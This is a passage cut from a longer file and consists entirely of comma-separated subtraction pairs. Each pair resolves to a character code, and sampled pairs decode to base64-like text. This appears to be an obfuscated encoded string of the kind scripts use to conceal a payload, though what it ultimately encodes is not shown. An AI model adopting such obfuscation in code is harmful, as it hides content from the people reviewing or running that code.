– 6, 77 – 2, 109 – 1, 125 – 9, 102 – 2, 72 – 1, 107 – 3, 57 – 9, 53 – 3, 81 – 5, 110 – 6, 90 – 9, 105 – 8, 71 – 3, 93 – 9, 60 – 4, 67 – 2, 79 – 5, 90 – 9, 77 – 8, 106 – 6, 77 – 4, 125 – 4, 51 – 3, 73 – 7, 75 – 7, 74 – 5, 64 – 7, 109 – 1, 86 – 1, 57 – 8, 120 – 4, 90 – 9, 86 – 2, 59 – 9, 84 – 2, 119 – 9, 94 – 8, 95 – 8, 81 – 7, 75 – 2, 107 – 9, 78 – 8, 79 – 1, 105 – 8, 92 – 8, 88 – 2, 78 – 4, 111 – 4, 104 – 7, 112 – 5, 89 – 7, 80 – 7, 90 – 7, 74 – 3, 121 – 1, 89 – 5, 91 – 4, 114 – 7, 53 – 5, 88 – 9, 85 – 6, 77 – 6, 115 – 4, 73 – 8, 74 – 8, 121 – 2, 116 – 1, 60 – 7, 77 – 5, 107 – 3, 65 – 9, 74 – 6, 68 – 2, 114 – 5, 119 – 8, 121 – 9, 68 – 1, 121 – 2, 107 – 8, 72 – 4, 83 – 9, 86 – 4, 96 – 6, 90 – 5, 68 – 2, 68 – 2, 121 – 2, 108 – 5, 77 – 1, 121 – 1, 122 – 3, 115 – 5, 75 – 7, 117 – 8, 85 – 3, 93 – 8, 74 – 6, 89 – 7, 53 – 4, 108 – 6, 83 – 5, 129 – 8, 57 – 1, 90 – 9, 76 – 4, 70 – 5, 72 – 3, 107 – 2, 75 – 5, 72 – 7, 115 – 7, 79 – 4, 94 – 7, 53 – 3, 85 – 3, 120 – 6, 89 – 2, 88 – 2, 91 – 5, 74 – 1, 98 – 9, 94 – 9, 83 – 9, 120 – 1, 92 – 8, 88 – 2, 78 – 4, 115 – 8, 104 – 7, 108 – 1, 89 – 7, 77 – 4, 86 – 3, 73 – 2, 126 – 6, 88 – 4, 88 – 1, 112 – 5, 52 – 3, 84 – 1, 98 – 8, 73 – 2, 115 – 3, 72 – 3, 72 – 2, 69 – 3, 91 – 9, 119 – 4, 71 – 1, 123 – 3, 90 – 5, 83 – 4, 74 – 8, 130 – 9, 111 – 4, 122 – 4, 69 – 2, 110 – 6, 122 – 2, 77 – 6, 85 – 9, 124 – 4, 128 – 9, 91 – 5, 74 – 8, 107 – 3, 122 – 7, 108 – 4, 93 – 3, 69 – 4, 56 – 8, 77 – 6, 76 – 8, 69 – 2, 114 – 7, 78 – 2, 82 – 4, 85 – 4, 118 – 2, 100 – 3, 96 – 7, 127 – 5, 49 – 1, 82 – 6, 73 – 2, 109 – 6, 123 – 4, 63 – 7, 70 – 5, 89 – 7, 62 – 6, 104 – 3, 70 – 5, 88 – 6, 119 – 4, 50 – 7, 72 – 7, 85 – 3, 117 – 2, 102 – 3, 106 – 9, 53 – 4, 119 – 7, 100 – 3, 93 – 9, 75 – 6, 64 – 7, 61 – 8, 98 – 1, 112 – 5, 117 – 9, 99 – 9, 85 – 4, 88 – 1, 126 – 6, 85 – 1, 71 – 6, 96 – 9, 105 – 5, 87 – 4, 94 – 4, 73 – 2, 117 – 5, 74 – 5, 87 – 4, 74 – 5, 109 – 6, 47 – 4, 73 – 3, 104 – 1, 61 – 9, 97 – 8, 67 – 2, 74 – 7, 114 – 2, 121 – 8, 70 – 1, 75 – 9, 118 – 7, 105 – 5, 78 – 3, 89 – 4, 106 – 2, 121 – 2, 85 – 1, 95 – 9, 75 – 1, 109 – 2, 100 – 3, 112 – 8, 112 – 4, 74 – 1, 69 – 1, 90 – 7, 70 – 5, 74 – 9, 75 – 3, 52 – 4, 51 – 3, 79 – 5, 91 – 7, 113 – 4, 116 – 4, 75 – 6, 88 – 5, 72 – 3, 106 – 2, 123 – 8, 89 – 4, 128 – 9, 115 – 8, 81 – 8, 67 – 1, 104 – 1, 105 – 6, 117 – 9, 76 – 9, 126 – 7, 80 – 3, 75 – 9, 80 – 5, 89 – 3, 123 – 7, 96 – 7, 78 – 6, 122 – 2, 103 – 4, 113 – 8, 79 – 3, 123 – 3, 96 – 7, 106 – 9, 75 – 7, 90 – 6, 55 – 3, 105 – 1, 73 – 1, 123 – 4, 116 – 9, 101 – 3, 83 – 5, 111 – 6, 65 – 9, 79 – 7, 80 – 8, 70 – 3, 123 – 8, 107 – 1, 80 – 8, 69 – 3, 75 – 6, 72 – 3, 72 – 2, 52 – 2, 95 – 5, 117 – 8, 90 – 8, 71 – 2, 120 – 9, 80 – 3, 82 – 9, 54 – 5, 81 – 4, 92 – 7, 73 – 8, 112 – 9, 97 – 7, 114 – 7, 80 – 1, 68 – 3, 71 – 2, 80 – 3, 67 – 2, 85 – 1, 58 – 6, 89 – 2, 79 – 8, 86 – 4, 114 – 6, 86 – 5, 100 – 3, 73 – 2, 119 – 7, 90 – 6, 89 – 2, 53 – 4, 111 – 7, 112 – 4, 92 – 9, 76 – 4, 72 – 6, 82 – 4, 94 – 9, 111 – 2, 89 – 7, 121 – 8, 85 – 3, 76 – 7, 109 – 6, 106 – 9, 81 – 6, 84 – 3, 100 – 1, 85 – 5, 75 – 3, 123 – 3, 125 – 5, 116 – 9, 77 – 1, 67 – 2, 93 – 8, 71 – 2, 75 – 4, 123 – 2, 113 – 5, 82 – 9, 104 – 5, 71 – 2, 52 – 3, 91 – 8, 95 – 5, 77 – 6, 117 – 6, 96 – 6, 92 – 3, 116 – 9, 107 – 3, 116 – 1, 72 – 4, 119 – 9, 71 – 5, 117 – 7, 71 – 3, 53 – 5, 57 – 4, 72 – 7, 102 – 4, 109 – 6, 58 – 6, 104 – 4, 75 – 2, 112 – 8, 71 – 6, 83 – 4, 70 – 4, 73 – 7, 57 – 9, 116 – 3, 105 – 8, 108 – 5, 107 – 8, 102 – 5, 69 – 1, 92 – 9, 49 – 1, 81 – 9, 74 – 2, 126 – 4, 50 – 2, 109 – 9, 87 – 9, 70 – 2, 60 – 4, 89 – 4, 82 – 1, 71 – 2, 70 – 1, 57 – 6, 109 – 8, 91 – 5, 114 – 2, 87 – 9, 70 – 4, 72 – 5, 93 – 8, 58 – 6, 84 – 2, 71 – 5, 108 – 5, 79 – 7, 86 – 6, 72 – 7, 91 – 2, 80 – 5, 90 – 6, 90 – 5, 65 – 8, 115 – 8, 85 – 9, 112 – 9, 117 – 2, 85 – 9, 76 – 4, 84 – 1, 71 – 2, 93 – 6, 74 – 4, 69 – 3, 115 – 7, 102 – 3, 81 – 7, 131 – 9, 104 – 1, 69 – 3, 74 – 7, 87 – 5, 121 – 2, 117 – 5, 83 – 5, 107 – 3, 94 – 5, 78 – 5, 77 – 5, 123 – 2, 74 – 5, 111 – 4, 78 – 9, 73 – 4, 73 – 7, 86 – 6, 79 – 4, 69 – 3, 120 – 9, 78 – 1, 89 – 6, 109 – 1, 122 – 6, 52 – 5, 84 – 3, 76 – 7, 91 – 9, 77 – 4, 79 – 8, 76 – 9, 80 – 3, 74 – 6, 77 – 9, 121 – 1, 55 – 6, 107 – 8, 83 – 5, 129 – 7, 61 – 9, 109 – 9, 68 – 2, 69 – 4, 57 – 8, 111 – 6, 72 – 7, 126 – 6, 93 – 8, 110 – 9, 78 – 7, 128 – 6, 74 – 9, 108 – 2, 72 – 5, 125 – 6, 95 – 5, 76 – 3, 105 – 6, 88 – 2, 79 – 1, 109 – 9, 77 – 9, 75 – 9, 74 – 9, 52 – 1, 76 – 2, 83 – 2, 111 – 8, 101 – 1, 73 – 1, 68 – 1, 111 – 3, 87 – 2, 84 – 3, 92 – 5, 103 – 3, 92 – 9, 97 – 7, 69 – 1, 118 – 7, 77 – 1, 74 – 3, 69 – 3, 53 – 5, 63 – 7, 92 – 4, 87 – 6, 110 – 3, 93 – 3, 72 – 5, 129 – 8, 111 – 8, 123 – 5, 86 – 3, 112 – 8, 60 – 4, 75 – 9, 80 – 5, 73 – 8, 104 – 5, 92 – 9, 85 – 1, 93 – 8, 61 – 4, 111 – 4, 103 – 5, 88 – 2, 88 – 2, 95 – 6, 94 – 7, 76 – 5, 112 – 4, 87 – 2, 83 – 2, 95 – 8, 107 – 7, 88 – 5, 94 – 4, 75 – 7, 113 – 2, 82 – 6, 74 – 3, 75 – 9, 56 – 8, 63 – 7, 91 – 3, 89 – 8, 113 – 6, 96 – 6, 76 – 9, 124 – 3, 110 – 7, 124 – 6, 86 – 3, 104 – 1, 72 – 7, 85 – 7, 79 – 5, 83 – 1, 90 – 9, 92 – 9, 76 – 5, 90 – 4, 81 – 7, 62 – 9, 100 – 3, 115 – 8, 85 – 7, 97 – 7, 93 – 6, 81 – 9, 129 – 9, 89 – 2, 94 – 6, 92 – 6, 95 – 5, 57 – 5, 91 – 1, 74 – 3, 116 – 5, 87 – 2, 70 – 4, 122 – 2, 107 – 4, 57 – 4, 66 – 1, 50 – 1, 85 – 4, 109 – 8, 75 – 9, 108 – 2, 55 – 7, 112 – 3, 67 – 2, 86 – 1, 98 – 9, 71 – 2, 77 – 2, 86 – 4, 86 – 1, 87 – 8, 86 – 2, 94 – 9, 65 – 8, 110 – 3, 102 – 1, 111 – 3, 62 – 5, 107 – 2, 87 – 4, 77 – 6, 120 – 1, 69 – 1, 75 – 5, 87 – 5, 57 – 9, 74 – 2, 85 – 7, 72 – 1, 82 – 1, 93 – 5, 79 – 7, 72 – 6, 70 – 1, 107 – 4, 77 – 7, 117 – 9, 89 – 8, 95 – 5, 75 – 3, 87 – 3, 90 – 8, 115 – 2, 95 – 8, 90 – 5, 108 – 4, 92 – 3, 103 – 3, 58 – 7, 113 – 5, 103 – 6, 92 – 8, 90 – 9, 74 – 1, 118 – 4, 87 – 8, 111 – 7, 78 – 9, 96 – 7, 84 – 2, 111 – 5, 57 – 1, 76 – 4, 66 – 1, 128 – 9, 71 – 2, 96 – 8, 101 – 4, 108 – 3, 108 – 5, 74 – 4, 73 – 6, 120 – 1, 84 – 7, 115 – 1, 73 – 8, 84 – 2, 88 – 3, 98 – 9, 76 – 4, 75 – 8, 67 – 2, 76 – 2, 71 – 4, 124 – 5, 83 – 2, 76 – 4, 88 – 8, 117 – 9, 85 – 7, 81 – 9, 92 – 8, 89 – 3, 86 – 1, 131 – 9, 79 – 6, 111 – 8, 55 – 7, 105 – 6, 71 – 3, 93 – 6, 117 – 1, 74 – 1, 102 – 3, 70 – 1, 56 – 7, 90 – 7, 79 – 1, 71 – 4, 88 – 3, 93 – 8, 79 – 7, 88 – 6, 113 – 9, 110 – 5, 71 – 6, 70 – 5, 60 – 8, 86 – 1, 78 – 6, 113 – 8, 77 – 7, 110 – 3, 74 – 2, 110 – 5, 75 – 6, 78 – 7, 80 – 5, 71 – 5, 90 – 1, 70 – 3, 89 – 5, 88 – 3, 62 – 5, 109 – 2, 103 – 4, 58 – 9, 50 – 1, 84 – 2, 93 – 8, 97 – 9, 92 – 6, 74 – 1, 104 – 5, 72 – 3, 56 – 7, 84 – 1, 74 – 1, 76 – 9, 90 – 5, 81 – 9, 75 – 3, 90 – 9, 86 – 1, 116 – 4, 81 – 9, 87 – 6, 61 – 8, 76 – 8, 77 – 8, 74 – 7, 122 – 7, 122 – 5, 74 – 2, 90 – 5, 92 – 3, 78 – 4, 82 – 2, 66 – 1, 82 – 5, 111 – 9, 68 – 3, 127 – 7, 96 – 7, 75 – 3, 80 – 7, 111 – 8, 51 – 3, 73 – 4, 71 – 3, 73 – 2, 84 – 3, 77 – 9, 74 – 4, 89 – 7, 57 – 9, 80 – 8, 83 – 5, 75 – 4, 80 – 2, 110 – 8, 97 – 8, 116 – 7, 78 – 4, 123 – 8, 91 – 6, 123 – 4, 113 – 2, 73 – 6, 73 – 8, 111 – 5, 75 – 6, 57 – 3, 88 – 5, 107 – 4, 103 – 4, 78 – 7, 77 – 1, 125 – 5, 63 – 7, 87 – 3, 70 – 2, 112 – 8, 115 – 7, 109 – 2, 104 – 4, 52 – 4, 87 – 6, 86 – 7, 78 – 6, 88 – 5, 80 – 7, 88 – 7, 69 – 1, 106 – 3, 84 – 3, 104 – 4, 84 – 9, 111 – 2, 79 – 5, 81 – 3, 92 – 9, 75 – 9, 86 – 8, 72 – 1, 86 – 1, 57 – 8, 113 – 1, 85 – 7, 91 – 6, 114 – 8, 77 – 4, 116 – 2, 77 – 7, 111 – 4, 107 – 4, 68 – 2, 77 – 4, 110 – 7, 101 – 2, 111 – 9, 77 – 5, 123 – 4, 89 – 8, 116 – 8, 80 – 6, 107 – 2, 54 – 6, 80 – 3, 89 – 6, 73 – 1, 76 – 6, 85 – 1, 74 – 7, 84 – 3, 109 – 6, 74 – 3, 71 – 3, 91 – 8, 90 – 9, 87 – 6, 70 – 2, 84 – 2, 118 – 7, 58 – 4, 75 – 6, 110 – 6, 94 – 4, 73 – 3, 95 – 8, 116 – 7, 51 – 2, 115 – 2, 95 – 8, 87 – 1, 96 – 6, 75 – 2, 81 – 3, 55 – 4, 114 – 6, 101 – 4, 89 – 5, 92 – 6, 82 – 8, 109 – 2, 98 – 1, 113 – 6, 87 – 6, 75 – 9, 71 – 3, 117 – 8, 129 – 9, 101 – 3, 92 – 5, 127 – 7, 112 – 1, 118 – 2, 80 – 5, 74 – 7, 88 – 3, 80 – 8, 72 – 5, 85 – 3, 121 – 2, 114 – 6, 81 – 9, 75 – 9, 89 – 7, 70 – 1, 86 – 1, 110 – 4, 60 – 3, 66 – 1, 84 – 2, 74 – 5, 112 – 8, 77 – 4, 107 – 9, 78 – 8, 80 – 2, 105 – 8, 93 – 9, 88 – 2, 81 – 8, 57 – 7, 82 – 6, 127 – 7, 72 – 7, 108 – 8, 73 – 2, 111 – 6, 77 – 3, 75 – 2, 107 – 8, 75 – 6, 50 – 1, 85 – 2, 95 – 5, 80 – 9, 113 – 1, 76 – 7, 84 – 1, 74 – 8, 92 – 6, 74 – 3, 86 – 1, 52 – 3, 121 – 9, 85 – 7, 88 – 3, 113 – 4, 86 – 4, 116 – 3, 69 – 3, 123 – 4, 89 – 8, 84 – 6, 78 – 2, 88 – 7, 70 – 1, 128 – 6, 69 – 4, 127 – 8, 91 – 2, 112 – 8, 85 – 6, 69 – 3, 81 – 8, 83 – 9, 75 – 9, 76 – 5, 85 – 4, 100 – 3, 76 – 6, 72 – 6, 112 – 5, 97 – 9, 87 – 9, 109 – 3, 120 – 1, 74 – 4, 69 – 3, 70 – 3, 72 – 3, 115 – 4, 91 – 4, 113 – 6, 74 – 4, 114 – 4, 93 – 8, 118 – 9, 88 – 6, 117 – 4, 91 – 9, 74 – 5, 110 – 6, 75 – 2, 84 – 5, 126 – 6, 118 – 7, 86 – 1, 68 – 1, 86 – 4, 53 – 5, 128 – 6, 91 – 1, 67 – 2, 106 – 3, 76 – 4, 72 – 5, 122 – 1, 57 – 9, 80 – 8, 73 – 4, 124 – 5, 76 – 3, 100 – 1, 94 – 4, 76 – 4, 101 – 1, 78 – 9, 75 – 3, 125 – 3, 108 – 9, 109 – 6, 73 – 1, 71 – 5, 114 – 7, 78 – 1, 70 – 4, 106 – 1, 57 – 9, 117 – 9, 73 – 6, 111 – 3, 79 – 1, 113 – 8, 107 – 9, 77 – 7, 81 – 3, 102 – 5, 87 – 3, 88 – 7, 65 – 8, 114 – 3, 99 – 2, 110 – 2, 92 – 6, 96 – 7, 82 – 1, 95 – 7, 104 – 4, 56 – 3, 106 – 7, 75 – 6, 54 – 5, 90 – 7, 83 – 4, 92 – 4, 73 – 3, 118 – 1, 93 – 4, 110 – 3, 113 – 9, 122 – 7, 75 – 9, 90 – 8, 121 – 6, 103 – 1, 92 – 7, 114 – 8, 84 – 2, 115 – 2, 94 – 7, 86 – 1, 107 – 4, 79 – 2, 81 – 8, 127 – 7, 74 – 9, 81 – 1, 66 – 1, 67 – 1, 100 – 1, 117 – 4, 89 – 9, 111 – 4, 119 – 8, 84 – 8, 77 – 6, 112 – 7, 110 – 3, 92 – 9, 72 – 4, 109 – 6, 104 – 1, 55 – 4, 78 – 3, 69 – 2, 61 – 5, 76 – 2, 74 – 6, 90 – 9, 92 – 3, 53 – 1, 88 – 1, 55 – 6, 57 – 9, 105 – 5, 94 – 8, 91 – 4, 54 – 5, 125 – 5, 100 – 2, 109 – 2, 113 – 9, 77 – 4, 81 – 1, 72 – 2, 57 – 9, 88 – 4, 68 – 3, 125 – 5, 126 – 7, 108 – 4, 86 – 7, 76 – 8, 70 – 5, 87 – 9, 70 – 1, 69 – 1, 107 – 3, 87 – 3, 85 – 3, 54 – 6, 58 – 9, 85 – 4, 71 – 5, 123 – 2, 81 – 8, 75 – 9, 68 – 1, 127 – 8, 78 – 1, 116 – 8, 73 – 1, 83 – 1, 51 – 2, 86 – 8, 71 – 4, 126 – 5, 117 – 2, 54 – 7, 77 – 7, 111 – 4, 109 – 6, 76 – 1, 84 – 4, 106 – 2, 127 – 8, 81 – 3, 74 – 2, 109 – 5, 104 – 5, 52 – 2, 105 – 8, 107 – 4, 97 – 8, 84 – 6, 76 – 8, 112 – 7, 79 – 2, 73 – 7, 79 – 7, 53 – 5, 50 – 2, 91 – 7, 76 – 2, 122 – 1, 111 – 4, 75 – 9, 73 – 2, 122 – 2, 120 – 5, 116 – 8, 79 – 7, 84 – 2, 54 – 5, 83 – 5, 91 – 6, 78 – 9, 56 – 3, 122 – 9, 88 – 6, 70 – 1, 109 – 5, 82 – 9, 96 – 6, 52 – 3, 81 – 4, 83 – 5, 67 – 1, 71 – 5, 123 – 4, 104 – 1, 81 – 7, 85 – 3, 87 – 9, 75 – 4, 70 – 4, 72 – 5, 81 – 4, 84 – 3, 74 – 3, 128 – 8, 110 – 3, 106 – 8, 76 – 1, 124 – 3, 87 – 5, 84 – 9, 66 – 1, 66 – 1, 101 – 2, 56 – 9, 67 – 1, 58 – 9, 121 – 9, 72 – 1, 90 – 5, 111 – 2, 96 – 6, 109 – 2, 88 – 5, 112 – 5, 94 – 4, 76 – 1, 104 – 4, 55 – 4, 113 – 5, 101 – 4, 86 – 2, 82 – 1, 79 – 5, 121 – 8, 86 – 7, 84 – 2, 71 – 6, 91 – 9, 68 – 2, 71 – 4, 116 – 8, 101 – 1, 71 – 3, 111 – 8, 108 – 5, 83 – 8, 81 – 4, 67 – 2, 120 – 5, 81 – 8, 73 – 8, 83 – 2, 57 – 1, 107 – 2, 92 – 7, 53 – 5, 108 – 8, 79 – 1, 87 – 1, 86 – 3, 106 – 7, 121 – 3, 75 – 8, 111 – 7, 123 – 4, 83 – 5, 81 – 1, 109 – 1, 90 – 8, 73 – 7, 98 – 8, 53 – 4, 77 – 3, 112 – 5, 91 – 1, 88 – 3, 122 – 7, 92 – 3, 87 – 5, 108 – 2, 65 – 9, 78 – 6, 74 – 9, 126 – 7, 75 – 6, 90 – 2, 100 – 3, 106 – 1, 106 – 7, 75 – 5, 76 – 5, 104 – 1, 61 – 5, 112 – 4, 80 – 8, 92 – 6, 113 – 1, 90 – 9, 91 – 6, 111 – 2, 80 – 2, 54 – 2, 92 – 6, 68 – 2, 106 – 3, 84 – 3, 107 – 9, 74 – 8, 75 – 2, 89 – 9, 72 – 1, 85 – 3, 53 – 4, 114 – 8, 105 – 6, 89 – 2, 62 – 9, 74 – 1, 90 – 7, 76 – 5, 86 – 8, 102 – 3, 69 – 2, 114 – 7, 85 – 8, 74 – 8, 78 – 1, 74 – 6, 81 – 4, 74 – 1, 71 – 3, 94 – 9, 92 – 3, 107 – 4, 76 – 6, 106 – 2, 120 – 1, 91 – 1, 92 – 7, 119 – 9, 117 – 9, 118 – 5, 82 – 1, 52 – 3, 118 – 6, 92 – 3, 88 – 8, 74 – 9, 118 – 2, 104 – 4, 90 – 4, 111 – 1, 107 – 3, 115 – 8, 98 – 1, 112 – 8, 85 – 3, 77 – 6, 75 – 4, 125 – 3, 108 – 5, 77 – 2, 77 – 7, 109 – 6, 113 – 9, 106 – 7, 81 – 8, 108 – 3, 91 – 6, 84 – 9, 76 – 4, 76 – 8, 119 – 4, 109 – 1, 74 – 7, 89 – 7, 62 – 5, 81 – 3, 88 – 4, 59 – 9, 88 – 6, 122 – 6, 75 – 3, 70 – 1, 90 – 5, 72 – 3, 82 – 6, 90 – 9, 71 – 2, 107 – 7, 69 – 2, 72 – 2, 90 – 4, 48 – 1, 87 – 6, 72 – 3, 91 – 9, 77 – 4, 74 – 3, 73 – 2, 74 – 1, 72 – 7, 75 – 7, 105 – 1, 82 – 1, 103 – 2, 76 – 3, 94 – 7, 84 – 3, 91 – 6, 69 – 3, 122 – 2, 121 – 6, 117 – 9, 69 – 3, 129 – 9, 81 – 4, 72 – 5, 78 – 6, 74 – 3, 91 – 9, 54 – 3, 86 – 4, 78 – 9, 59 – 3, 102 – 5, 76 – 1, 88 – 6, 63 – 7, 99 – 1, 79 – 8, 89 – 7, 117 – 2, 130 – 9, 82 – 6, 57 – 9, 80 – 2, 91 – 7, 92 – 3, 111 – 2, 127 – 7, 85 – 1, 71 – 4, 110 – 3, 85 – 8, 75 – 4, 79 – 6, 93 – 9, 79 – 6, 82 – 1, 77 – 2, 128 – 9, 105 – 6, 111 – 6, 70 – 4, 127 – 7, 57 – 1, 74 – 6, 75 – 9, 116 – 7, 86 – 4, 52 – 1, 91 – 9, 70 – 4, 113 – 9, 77 – 6, 83 – 9, 88 – 6, 49 – 1, 91 – 6, 74 – 7, 74 – 9, 67 – 2, 83 – 2, 85 – 9, 122 – 2, 121 – 2, 104 – 5, 90 – 5, 53 – 5, 93 – 3, 91 – 7, 89 – 2, 108 – 4, 54 – 6, 105 – 5, 86 – 8, 69 – 1, 58 – 2, 88 – 3, 86 – 4, 112 – 9, 110 – 3, 59 – 3, 71 – 6, 121 – 1, 57 – 1, 75 – 7, 74 – 4, 106 – 3, 104 – 5, 106 – 1, 71 – 3, 83 – 2, 87 – 6, 85 – 8, 92 – 2, 74 – 9, 80 – 2, 88 – 4, 87 – 1, 113 – 3, 111 – 7, 88 – 9, 99 – 2, 112 – 5, 83 – 2, 105 – 8, 73 – 5, 90 – 6, 109 – 6, 72 – 1, 74 – 7, 71 – 6, 81 – 3, 90 – 7, 81 – 3, 71 – 4, 86 – 1, 94 – 9, 78 – 6, 83 – 1, 110 – 6, 57 – 6, 102 – 1, 88 – 7, 107 – 7, 115 – 5, 107 – 6, 76 – 9, 79 – 6, 54 – 7, 71 – 4, 108 – 5, 119 – 4, 104 – 5, 79 – 5, 86 – 4, 122 – 3, 91 – 6, 93 – 9, 85 – 3, 74 – 5, 58 – 8, 82 – 6, 124 – 5, 90 – 5, 102 – 3, 76 – 8, 87 – 6, 53 – 1, 75 – 4, 73 – 5, 107 – 3, 108 – 1, 103 – 3, 84 – 9, 111 – 2, 80 – 6, 79 – 1, 90 – 7, 68 – 2, 79 – 1, 74 – 3, 94 – 9, 50 – 1, 118 – 7, 105 – 7, 72 – 3, 129 – 7, 98 – 8, 118 – 5, 73 – 7, 108 – 4, 54 – 6, 107 – 8, 84 – 5, 70 – 4, 124 – 5, 87 – 2, 92 – 8, 92 – 7, 61 – 4, 112 – 5, 79 – 3, 109 – 6, 122 – 7, 82 – 6, 74 – 2, 89 – 6, 70 – 1, 91 – 4, 73 – 3, 74 – 8, 115 – 7, 101 – 2, 81 – 7, 126 – 4, 107 – 4, 70 – 4, 74 – 7, 83 – 1, 122 – 3, 113 – 1, 80 – 2, 113 – 9, 95 – 6, 80 – 7, 78 – 6, 124 – 3, 75 – 6, 115 – 8, 78 – 9, 77 – 8, 74 – 8, 87 – 7, 78 – 3, 73 – 7, 117 – 6, 81 – 4, 88 – 5, 110 – 2, 124 – 8, 55 – 8, 84 – 3, 72 – 3, 87 – 5, 77 – 4, 68 – 1, 110 – 4, 113 – 6, 75 – 3, 76 – 8, 108 – 5, 82 – 9, 102 – 3, 106 – 9, 113 – 7, 116 – 9, 83 – 2, 70 – 1, 89 – 8, 86 – 5, 118 – 6, 94 – 6, 82 – 1, 114 – 3, 72 – 5, 67 – 2, 85 – 2, 57 – 9, 50 – 7, 72 – 4, 90 – 9, 103 – 4, 74 – 3, 102 – 4, 71 – 2, 60 – 7, 105 – 8, 89 – 6, 106 – 2, 81 – 4, 117 – 8, 83 – 4, 89 – 8, 117 – 2, 75 – 6, 73 – 1, 90 – 6, 111 – 8, 88 – 1, 93 – 5, 87 – 1, 94 – 4, 55 – 3, 94 – 4, 76 – 5, 115 – 4, 74 – 3, 79 – 7, 91 – 9, 121 – 2, 53 – 1, 76 – 4, 75 – 9, 86 – 4, 75 – 7, 70 – 5, 93 – 9, 69 – 4, 125 – 3, 72 – 5, 72 – 7, 55 – 6, 74 – 3, 85 – 6, 70 – 4, 120 – 1, 84 – 9, 85 – 1, 89 – 4, 59 – 2, 115 – 8, 104 – 6, 92 – 6, 97 – 7, 91 – 2, 86 – 2, 95 – 8, 122 – 6, 78 – 5, 101 – 2, 77 – 8, 54 – 5, 91 – 8, 75 – 1, 113 – 7, 62 – 6, 87 – 6, 79 – 7, 73 – 8, 102 – 3, 108 – 3, 92 – 4, 86 – 5, 109 – 2, 97 – 7, 69 – 2, 124 – 3, 109 – 6, 121 – 3, 86 – 3, 105 – 2, 90 – 9, 83 – 5, 79 – 4, 107 – 4, 104 – 4, 105 – 8, 94 – 9, 72 – 2, 78 – 4, 115 – 9, 104 – 3, 58 – 9, 89 – 7, 85 – 7, 86 – 2, 55 – 4, 104 – 4, 59 – 6, 90 – 3, 109 – 2, 51 – 3, 89 – 8, 79 – 2, 87 – 3, 61 – 9, 85 – 4, 72 – 6, 123 – 4, 93 – 3, 114 – 9, 74 – 9, 69 – 4, 59 – 7, 94 – 9, 81 – 9, 114 – 9, 77 – 7, 116 – 9, 71 – 1, 107 – 4, 76 – 7, 89 – 9, 80 – 6, 67 – 2, 105 – 5, 104 – 7, 94 – 9, 71 – 1, 80 – 6, 115 – 9, 108 – 7, 52 – 3, 89 – 7, 81 – 3, 89 – 5, 55 – 4, 104 – 4, 56 – 3, 91 – 4, 114 – 7, 52 – 4, 86 – 5, 82 – 5, 85 – 1, 60 – 8, 85 – 4, 75 – 9, 123 – 4, 99 – 9, 113 – 8, 66 – 1, 69 – 4, 57 – 5, 86 – 1, 78 – 6, 114 – 9, 72 – 2, 111 – 4, 71 – 2, 126 – 7, 75 – 6, 86 – 9, 84 – 5, 70 – 4, 122 – 6, 100 – 3, 93 – 8, 79 – 9, 83 – 9, 109 – 3, 103 – 4, 112 – 4, 86 – 4, 80 – 2, 87 – 3, 59 – 8, 108 – 8, 60 – 7, 88 – 1, 109 – 2, 49 – 1, 82 – 1, 82 – 5, 91 – 7, 59 – 7, 83 – 2, 71 – 5, 127 – 8, 98 – 8, 111 – 6, 71 – 6, 70 – 5, 57 – 5, 88 – 3, 81 – 9, 110 – 5, 75 – 5, 115 – 8, 71 – 5, 110 – 7, 106 – 7, 102 – 5, 76 – 1, 68 – 2, 91 – 2, 80 – 7, 90 – 6, 90 – 5, 58 – 1, 116 – 9, 102 – 5, 71 – 1, 92 – 7, 90 – 1, 73 – 4, 76 – 5, 121 – 2, 67 – 2, 75 – 5, 84 – 3, 70 – 1, 102 – 4, 82 – 9, 77 – 6, 116 – 5, 80 – 9, 75 – 9, 70 – 5, 109 – 2, 125 – 7, 75 – 4, 71 – 1, 107 – 3, 91 – 4, 104 – 3, 72 – 1, 84 – 2, 121 – 8, 71 – 5, 105 – 1, 55 – 7, 105 – 6, 88 – 9, 69 – 3, 125 – 6, 88 – 3, 90 – 9, 123 – 4, 78 – 9, 123 – 4, 81 – 4, 122 – 3, 105 – 2, 87 – 9, 86 – 4, 109 – 3, 104 – 1, 89 – 2, 71 – 6, 105 – 1, 109 – 2, 126 – 4, 83 – 8, 72 – 5, 80 – 3, 73 – 5, 72 – 6, 116 – 9, 112 – 8, 121 – 1, 87 – 2, 58 – 9, 51 – 3, 82 – 3, 72 – 2, 129 – 8, 115 – 4, 48 – 5, 72 – 7, 87 – 5, 114 – 2, 88 – 8, 108 – 8, 59 – 8, 113 – 5, 105 – 8, 86 – 2, 86 – 4, 70 – 5, 123 – 3, 84 – 4, 109 – 5, 67 – 2, 79 – 7, 68 – 2, 114 – 5, 75 – 2, 73 – 8, 77 – 9, 113 – 9, 90 – 9, 109 – 8, 81 – 8, 90 – 3, 90 – 9, 86 – 3, 73 – 5, 83 – 1, 119 – 8, 55 – 3, 73 – 2, 107 – 3, 109 – 2, 85 – 8, 79 – 7, 110 – 7, 91 – 6, 114 – 5, 76 – 8, 84 – 3, 58 – 2, 76 – 5, 101 – 3, 78 – 9, 61 – 8, 105 – 8, 86 – 3, 112 – 8, 59 – 3, 119 – 3, 77 – 1, 107 – 4, 73 – 8, 78 – 9, 77 – 9, 93 – 6, 117 – 1, 79 – 6, 105 – 6, 76 – 7, 52 – 3, 89 – 6, 80 – 6, 109 – 3, 58 – 2, 82 – 1, 75 – 3, 74 – 9, 102 – 3, 106 – 1, 94 – 6, 87 – 6, 110 – 3, 95 – 5, 75 – 8, 126 – 5, 111 – 8, 124 – 6, 89 – 6, 111 – 8, 92 – 7, 83 – 9, 89 – 9, 110 – 6, 87 – 6, 90 – 6, 73 – 8, 55 – 6, 78 – 4, 62 – 9, 101 – 4, 114 – 7, 79 – 1, 98 – 9, 85 – 3, 73 – 2, 121 – 2, 89 – 6, 71 – 3, 124 – 4, 114 – 7, 102 – 2, 93 – 4, 54 – 3, 74 – 4, 126 – 9, 88 – 5, 70 – 1, 110 – 7, 124 – 7, 71 – 5, 112 – 9, 61 – 9, 95 – 5, 73 – 1, 89 – 6, 119 – 7, 115 – 8, 77 – 7, 126 – 6, 126 – 7, 91 – 9, 77 – 4, 68 – 2, 99 – 9, 90 – 5, 74 – 6, 109 – 6, 102 – 3, 51 – 1, 83 – 4, 87 – 6, 116 – 1, 102 – 5, 91 – 8, 76 – 4, 74 – 4, 91 – 7, 90 – 2, 90 – 8, 55 – 7, 106 – 6, 85 – 9, 88 – 5, 